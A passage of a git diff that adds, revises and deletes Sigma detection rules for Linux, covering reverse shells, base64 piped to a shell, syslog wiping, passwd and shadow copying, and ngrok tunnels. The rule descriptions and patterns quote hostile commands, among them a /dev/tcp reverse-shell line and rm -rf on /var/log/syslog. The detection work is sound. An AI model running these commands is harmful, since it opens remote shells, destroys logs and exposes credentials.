attack.command_and_control + - attack.t1105 +logsource: + product: linux + category: file_event +detection: + selection: + Image|endswith: '/wget' + TargetFilename|startswith: + - '/tmp/' + - '/var/tmp/' + condition: selection +falsepositives: + - Legitimate downloads of files in the tmp folder. +level: medium diff --git a/src/main/resources/rules/linux/modsecurity/modsec_mulitple_blocks.yml b/src/main/resources/rules/linux/modsecurity/modsec_mulitple_blocks.yml deleted file mode 100644 index b086a3a68..000000000 --- a/src/main/resources/rules/linux/modsecurity/modsec_mulitple_blocks.yml +++ /dev/null @@ -1,23 +0,0 @@ -title: Multiple Modsecurity Blocks -id: a06eea10-d932-4aa6-8ba9-186df72c8d23 -status: stable -description: Detects multiple blocks by the mod_security module (Web Application Firewall) -author: Florian Roth -date: 2017/02/28 -logsource: - product: linux - service: modsecurity -detection: - selection: - - 'mod_security: Access denied' - - 'ModSecurity: Access denied' - - 'mod_security-message: Access denied' - timeframe: 120m - condition: selection -falsepositives: - - Vulnerability scanners - - Frequent attacks if system faces Internet -level: medium -tags: - - attack.impact - - attack.t1499 diff --git a/src/main/resources/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/src/main/resources/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml index cda154205..e6337afbc 100644 --- a/src/main/resources/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml +++ b/src/main/resources/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml @@ -1,22 +1,26 @@ title: Linux Reverse Shell Indicator id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 -status: experimental +status: test description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') references: - - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md +author: Florian Roth (Nextron Systems) date: 2021/10/16 -author: Florian Roth +modified: 2022/12/25 +tags: + - attack.execution + - attack.t1059.004 logsource: - product: linux - category: network_connection + product: linux + category: network_connection detection: - selection: - Image|endswith: '/bin/bash' - filter: - DestinationIp: - - '127.0.0.1' - - '0.0.0.0' - condition: selection and not filter + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: critical diff --git a/src/main/resources/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml b/src/main/resources/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml index 33aff0f73..4bb860662 100644 --- a/src/main/resources/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml +++ b/src/main/resources/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml @@ -3,9 +3,12 @@ id: a46c93b7-55ed-4d27-a41b-c259456c4746 status: stable description: Detects process connections to a Monero crypto mining pool references: - - https://www.poolwatch.io/coin/monero + - https://www.poolwatch.io/coin/monero +author: Florian Roth (Nextron Systems) date: 2021/10/26 -author: Florian Roth +tags: + - attack.impact + - attack.t1496 logsource: product: linux category: network_connection diff --git a/src/main/resources/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml b/src/main/resources/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml new file mode 100644 index 000000000..4496a3c01 --- /dev/null +++ b/src/main/resources/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml @@ -0,0 +1,35 @@ +title: Communication To Ngrok Tunneling Service - Linux +id: 19bf6fdb-7721-4f3d-867f-53467f6a5db6 +status: test +description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors +references: + - https://twitter.com/hakluke/status/1587733971814977537/photo/1 + - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent +author: Florian Roth (Nextron Systems) +date: 2022/11/03 +tags: + - attack.exfiltration + - attack.command_and_control + - attack.t1567 + - attack.t1568.002 + - attack.t1572 + - attack.t1090 + - attack.t1102 + - attack.s0508 +logsource: + product: linux + category: network_connection +detection: + selection: + DestinationHostname|contains: + - 'tunnel.us.ngrok.com' + - 'tunnel.eu.ngrok.com' + - 'tunnel.ap.ngrok.com' + - 'tunnel.au.ngrok.com' + - 'tunnel.sa.ngrok.com' + - 'tunnel.jp.ngrok.com' + - 'tunnel.in.ngrok.com' + condition: selection +falsepositives: + - Legitimate use of ngrok +level: high diff --git a/src/main/resources/rules/linux/other/lnx_ssh_cve_2018_15473.yml b/src/main/resources/rules/linux/other/lnx_ssh_cve_2018_15473.yml deleted file mode 100644 index 4b422fb7c..000000000 --- a/src/main/resources/rules/linux/other/lnx_ssh_cve_2018_15473.yml +++ /dev/null @@ -1,22 +0,0 @@ -title: SSHD Error Message CVE-2018-15473 -id: 4c9d903d-4939-4094-ade0-3cb748f4d7da -status: test -description: Detects exploitation attempt using public exploit code for CVE-2018-15473 -author: Florian Roth -references: - - https://github.com/Rhynorater/CVE-2018-15473-Exploit -date: 2017/08/24 -modified: 2021/11/27 -logsource: - product: linux - service: sshd -detection: - keywords: - - 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]' - condition: keywords -falsepositives: - - Unknown -level: medium -tags: - - attack.reconnaissance - - attack.t1589 diff --git a/src/main/resources/rules/linux/other/lnx_susp_failed_logons_single_source.yml b/src/main/resources/rules/linux/other/lnx_susp_failed_logons_single_source.yml deleted file mode 100644 index 1f13b201c..000000000 --- a/src/main/resources/rules/linux/other/lnx_susp_failed_logons_single_source.yml +++ /dev/null @@ -1,25 +0,0 @@ -title: Failed Logins with Different Accounts from Single Source System -id: fc947f8e-ea81-4b14-9a7b-13f888f94e18 -status: test -description: Detects suspicious failed logins with different user accounts from a single source system -author: Florian Roth -date: 2017/02/16 -modified: 2021/11/27 -logsource: - product: linux - service: auth -detection: - selection: - pam_message: authentication failure - pam_user: '*' - pam_rhost: '*' - timeframe: 24h - condition: selection -falsepositives: - - Terminal servers - - Jump servers - - Workstations with frequently changing users -level: medium -tags: - - attack.credential_access - - attack.t1110 diff --git a/src/main/resources/rules/linux/other/lnx_susp_guacamole.yml b/src/main/resources/rules/linux/other/lnx_susp_guacamole.yml deleted file mode 100644 index 9de7add4c..000000000 --- a/src/main/resources/rules/linux/other/lnx_susp_guacamole.yml +++ /dev/null @@ -1,22 +0,0 @@ -title: Guacamole Two Users Sharing Session Anomaly -id: 1edd77db-0669-4fef-9598-165bda82826d -status: test -description: Detects suspicious session with two users present -author: Florian Roth -references: - - https://research.checkpoint.com/2020/apache-guacamole-rce/ -date: 2020/07/03 -modified: 2021/11/27 -logsource: - product: linux - service: guacamole -detection: - selection: - - '(2 users now present)' - condition: selection -falsepositives: - - Unknown -level: high -tags: - - attack.credential_access - - attack.t1212 diff --git a/src/main/resources/rules/linux/other/lnx_susp_named.yml b/src/main/resources/rules/linux/other/lnx_susp_named.yml deleted file mode 100644 index 6c7a43e2f..000000000 --- a/src/main/resources/rules/linux/other/lnx_susp_named.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Suspicious Named Error -id: c8e35e96-19ce-4f16-aeb6-fd5588dc5365 -status: test -description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts -author: Florian Roth -references: - - https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml -date: 2018/02/20 -modified: 2021/11/27 -logsource: - product: linux - service: syslog -detection: - keywords: - - '* dropping source port zero packet from *' - - '* denied AXFR from *' - - '* exiting (due to fatal error)*' - condition: keywords -falsepositives: - - Unknown -level: high -tags: - - attack.initial_access - - attack.t1190 diff --git a/src/main/resources/rules/linux/other/lnx_susp_ssh.yml b/src/main/resources/rules/linux/other/lnx_susp_ssh.yml deleted file mode 100644 index dbf3e58fe..000000000 --- a/src/main/resources/rules/linux/other/lnx_susp_ssh.yml +++ /dev/null @@ -1,33 +0,0 @@ -title: Suspicious OpenSSH Daemon Error -id: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc -status: test -description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts -author: Florian Roth -references: - - https://github.com/openssh/openssh-portable/blob/master/ssherr.c - - https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml -date: 2017/06/30 -modified: 2021/11/27 -logsource: - product: linux - service: sshd -detection: - keywords: - - '*unexpected internal error*' - - '*unknown or unsupported key type*' - - '*invalid certificate signing key*' - - '*invalid elliptic curve value*' - - '*incorrect signature*' - - '*error in libcrypto*' - - '*unexpected bytes remain after decoding*' - - '*fatal: buffer_get_string: bad string*' - - '*Local: crc32 compensation attack*' - - '*bad client public DH value*' - - '*Corrupted MAC on input*' - condition: keywords -falsepositives: - - Unknown -level: medium -tags: - - attack.initial_access - - attack.t1190 diff --git a/src/main/resources/rules/linux/other/lnx_susp_vsftp.yml b/src/main/resources/rules/linux/other/lnx_susp_vsftp.yml deleted file mode 100644 index 9109c095c..000000000 --- a/src/main/resources/rules/linux/other/lnx_susp_vsftp.yml +++ /dev/null @@ -1,38 +0,0 @@ -title: Suspicious VSFTPD Error Messages -id: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe -status: test -description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts -author: Florian Roth -references: - - https://github.com/dagwieers/vsftpd/ -date: 2017/07/05 -modified: 2021/11/27 -logsource: - product: linux - service: vsftpd -detection: - keywords: - - 'Connection refused: too many sessions for this address.' - - 'Connection refused: tcp_wrappers denial.' - - 'Bad HTTP verb.' - - 'port and pasv both active' - - 'pasv and port both active' - - 'Transfer done (but failed to open directory).' - - 'Could not set file modification time.' - - 'bug: pid active in ptrace_sandbox_free' - - 'PTRACE_SETOPTIONS failure' - - 'weird status:' - - 'couldn''t handle sandbox event' - - 'syscall * out of bounds' - - 'syscall not permitted:' - - 'syscall validate failed:' - - 'Input line too long.' - - 'poor buffer accounting in str_netfd_alloc' - - 'vsf_sysutil_read_loop' - condition: keywords -falsepositives: - - Unknown -level: medium -tags: - - attack.initial_access - - attack.t1190 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_at_command.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_at_command.yml index 9682052eb..8ba08536c 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_at_command.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_at_command.yml @@ -1,23 +1,26 @@ title: Scheduled Task/Job At id: d2d642d7-b393-43fe-bae4-e81ed5915c4b status: stable -description: Detects the use of at/atd +description: | + Detects the use of at/atd which are utilities that are used to schedule tasks. + They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md author: Ömer Günal, oscd.community date: 2020/10/06 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md +modified: 2022/07/07 +tags: + - attack.persistence + - attack.t1053.002 logsource: product: linux category: process_creation detection: selection: Image|endswith: - - '/at' - - '/atd' + - '/at' + - '/atd' condition: selection falsepositives: - Legitimate administration activities level: low -tags: - - attack.persistence - - attack.t1053.002 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml index 06fa3d0a0..f73fc3efe 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml @@ -2,22 +2,22 @@ title: Decode Base64 Encoded Text id: e2072cab-8c9a-459b-b63c-40ae79e27031 status: test description: Detects usage of base64 utility to decode arbitrary base64-encoded text -author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md +author: Daniil Yugoslavskiy, oscd.community date: 2020/10/19 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1027 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/base64' - CommandLine|contains: '-d' - condition: selection + selection: + Image|endswith: '/base64' + CommandLine|contains: '-d' # Also covers "--decode" + condition: selection falsepositives: - - Legitimate activities + - Legitimate activities level: low -tags: - - attack.defense_evasion - - attack.t1027 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml new file mode 100644 index 000000000..02cd87e73 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml @@ -0,0 +1,34 @@ +title: Linux Base64 Encoded Pipe to Shell +id: ba592c6d-6888-43c3-b8c6-689b8fe47337 +status: experimental +description: Detects suspicious process command line that uses base64 encoded input for execution with a shell +references: + - https://github.com/arget13/DDexec + - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally +author: pH-T (Nextron Systems) +date: 2022/07/26 +modified: 2023/06/16 +tags: + - attack.defense_evasion + - attack.t1140 +logsource: + product: linux + category: process_creation +detection: + selection_base64: + CommandLine|contains: 'base64 ' + selection_exec: + - CommandLine|contains: + - '| bash ' + - '| sh ' + - '|bash ' + - '|sh ' + - CommandLine|endswith: + - ' |sh' + - '| bash' + - '| sh' + - '|bash' + condition: all of selection_* +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml new file mode 100644 index 000000000..b5017a42e --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml @@ -0,0 +1,27 @@ +title: Linux Base64 Encoded Shebang In CLI +id: fe2f9663-41cb-47e2-b954-8a228f3b9dff +status: test +description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html + - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.defense_evasion + - attack.t1140 +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - "IyEvYmluL2Jhc2" # Note: #!/bin/bash" + - "IyEvYmluL2Rhc2" # Note: #!/bin/dash" + - "IyEvYmluL3pza" # Note: #!/bin/zsh" + - "IyEvYmluL2Zpc2" # Note: #!/bin/fish + - "IyEvYmluL3No" # Note: # !/bin/sh" + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml new file mode 100644 index 000000000..5867934c3 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml @@ -0,0 +1,23 @@ +title: Bash Interactive Shell +id: 6104e693-a7d6-4891-86cb-49a258523559 +status: test +description: Detects execution of the bash shell with the interactive flag "-i". +references: + - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet + - https://www.revshells.com/ + - https://linux.die.net/man/1/bash +author: '@d4ns4n_' +date: 2023/04/07 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/bash' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml new file mode 100644 index 000000000..eb6839b7b --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml @@ -0,0 +1,28 @@ +title: Enable BPF Kprobes Tracing +id: 7692f583-bd30-4008-8615-75dab3f08a99 +status: test +description: Detects common command used to enable bpf kprobes tracing +references: + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ + - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/25 +tags: + - attack.execution + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + CommandLine|contains|all: + - 'echo 1 >' + - '/sys/kernel/debug/tracing/events/kprobes/' + CommandLine|contains: + - '/myprobe/enable' + - '/myretprobe/enable' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml index a0c4b717f..8ffc0608f 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml @@ -1,23 +1,23 @@ title: BPFtrace Unsafe Option Usage id: f8341cb2-ee25-43fa-a975-d8a5a9714b39 -status: experimental +status: test description: Detects the usage of the unsafe bpftrace option -author: Andreas Hunkeler (@Karneades) -tags: - - attack.execution - - attack.t1059.004 references: - - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - - https://bpftrace.org/ + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ +author: Andreas Hunkeler (@Karneades) date: 2022/02/11 +tags: + - attack.execution + - attack.t1059.004 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: 'bpftrace' - CommandLine|contains: '--unsafe' - condition: selection1 + selection: + Image|endswith: 'bpftrace' + CommandLine|contains: '--unsafe' + condition: selection falsepositives: - - Legitimate usage of the unsafe option + - Legitimate usage of the unsafe option level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml new file mode 100644 index 000000000..ff14daba3 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml @@ -0,0 +1,25 @@ +title: Capabilities Discovery - Linux +id: d8d97d51-122d-4cdd-9e2f-01b4b4933530 +status: test +description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. +references: + - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes + - https://github.com/carlospolop/PEASS-ng + - https://github.com/diego-treitos/linux-smart-enumeration +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/12/28 +modified: 2024/03/05 +tags: + - attack.discovery + - attack.t1083 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/getcap' + CommandLine|contains|windash: ' -r ' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index 83e0dda21..68763fafd 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -2,23 +2,27 @@ title: Cat Sudoers id: 0f79c4d2-4e1f-4683-9c36-b5469a665e06 status: test description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights -author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ +author: Florian Roth (Nextron Systems) date: 2022/06/20 +modified: 2022/09/15 +tags: + - attack.reconnaissance + - attack.t1592.004 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/cat' - - 'grep' - CommandLine|contains: ' /etc/sudoers' - condition: selection + selection: + Image|endswith: + - '/cat' + - 'grep' + - '/head' + - '/tail' + - '/more' + CommandLine|contains: ' /etc/sudoers' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium -tags: - - attack.reconnaissance - - attack.t1592.004 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml new file mode 100644 index 000000000..3d3a589c9 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml @@ -0,0 +1,25 @@ +title: Remove Immutable File Attribute +id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 +related: + - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 + type: derived +status: test +description: Detects usage of the 'chattr' utility to remove immutable file attribute. +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.defense_evasion + - attack.t1222.002 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/chattr' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Administrator interacting with immutable files (e.g. for instance backups). +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml index 39899711a..37aee1399 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml @@ -1,11 +1,15 @@ title: Clear Linux Logs id: 80915f59-9b56-4616-9de0-fd0dea6c12fe status: stable -description: Detects clear logs +description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md author: Ömer Günal, oscd.community date: 2020/10/07 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md +modified: 2022/09/15 +tags: + - attack.defense_evasion + - attack.t1070.002 logsource: product: linux category: process_creation @@ -14,6 +18,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' CommandLine|contains: - '/var/log' - '/var/spool/mail' @@ -21,6 +26,3 @@ detection: falsepositives: - Legitimate administration activities level: medium -tags: - - attack.defense_evasion - - attack.t1070.002 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml index d826716e2..ff5820eb5 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml @@ -1,28 +1,33 @@ title: Commands to Clear or Remove the Syslog id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 -status: experimental -description: Detects specific commands commonly used to remove or empty the syslog. +status: test +description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md +author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021/10/15 -author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +modified: 2022/09/15 tags: - - attack.impact - - attack.t1565.001 -references: - - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_clear_syslog.yml + - attack.defense_evasion + - attack.t1070.002 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - 'rm /var/log/syslog' - - 'rm -r /var/log/syslog' - - 'rm -f /var/log/syslog' - - 'rm -rf /var/log/syslog' - - 'mv /var/log/syslog' - - ' >/var/log/syslog' - - ' > /var/log/syslog' - condition: selection + selection: + CommandLine|contains: + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'unlink /var/log/syslog' + - 'unlink -r /var/log/syslog' + - 'unlink -f /var/log/syslog' + - 'unlink -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' + condition: selection falsepositives: - - Log rotation. + - Log rotation. level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml index d585fc36c..bf691a47d 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml @@ -1,31 +1,28 @@ title: Clipboard Collection with Xclip Tool id: ec127035-a636-4b9a-8555-0efd4e59f316 -status: experimental -description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. -date: 2021/10/15 +status: test +description: | + Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. + Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +references: + - https://www.packetlabs.net/posts/clipboard-data-security/ author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/10/15 +modified: 2022/09/15 tags: - - attack.impact - - attack.t1485 -references: - - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml + - attack.collection + - attack.t1115 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection1: - Image|contains: 'xclip' - selection2: - CommandLine|contains: - - '-selection' - - '-sel' - selection3: - CommandLine|contains: - - 'clipboard' - - 'clip' - selection4: - CommandLine|contains: '-o' - condition: selection1 and selection2 and selection3 and selection4 + selection: + Image|contains: 'xclip' + CommandLine|contains|all: + - '-sel' + - 'clip' + - '-o' + condition: selection falsepositives: - - Legitimate usage of xclip tools. + - Legitimate usage of xclip tools. level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml new file mode 100644 index 000000000..585d63236 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml @@ -0,0 +1,28 @@ +title: Copy Passwd Or Shadow From TMP Path +id: fa4aaed5-4fe0-498d-bbc0-08e3346387ba +status: test +description: Detects when the file "passwd" or "shadow" is copied from tmp path +references: + - https://blogs.blackberry.com/ + - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/01/31 +tags: + - attack.credential_access + - attack.t1552.001 +logsource: + product: linux + category: process_creation +detection: + selection_img: + Image|endswith: '/cp' + selection_path: + CommandLine|contains: '/tmp/' + selection_file: + CommandLine|contains: + - 'passwd' + - 'shadow' + condition: all of selection_* +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml new file mode 100644 index 000000000..15f24392a --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml @@ -0,0 +1,25 @@ +title: Crontab Enumeration +id: 403ed92c-b7ec-4edd-9947-5b535ee12d46 +status: experimental +description: Detects usage of crontab to list the tasks of the user +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.discovery + - attack.t1007 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/crontab' + CommandLine|contains: ' -l' + condition: selection +falsepositives: + - Legitimate use of crontab +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml new file mode 100644 index 000000000..419d47d54 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml @@ -0,0 +1,23 @@ +title: Remove Scheduled Cron Task/Job +id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 +status: test +description: | + Detects usage of the 'crontab' utility to remove the current crontab. + This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: 'crontab' + CommandLine|contains: ' -r' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml 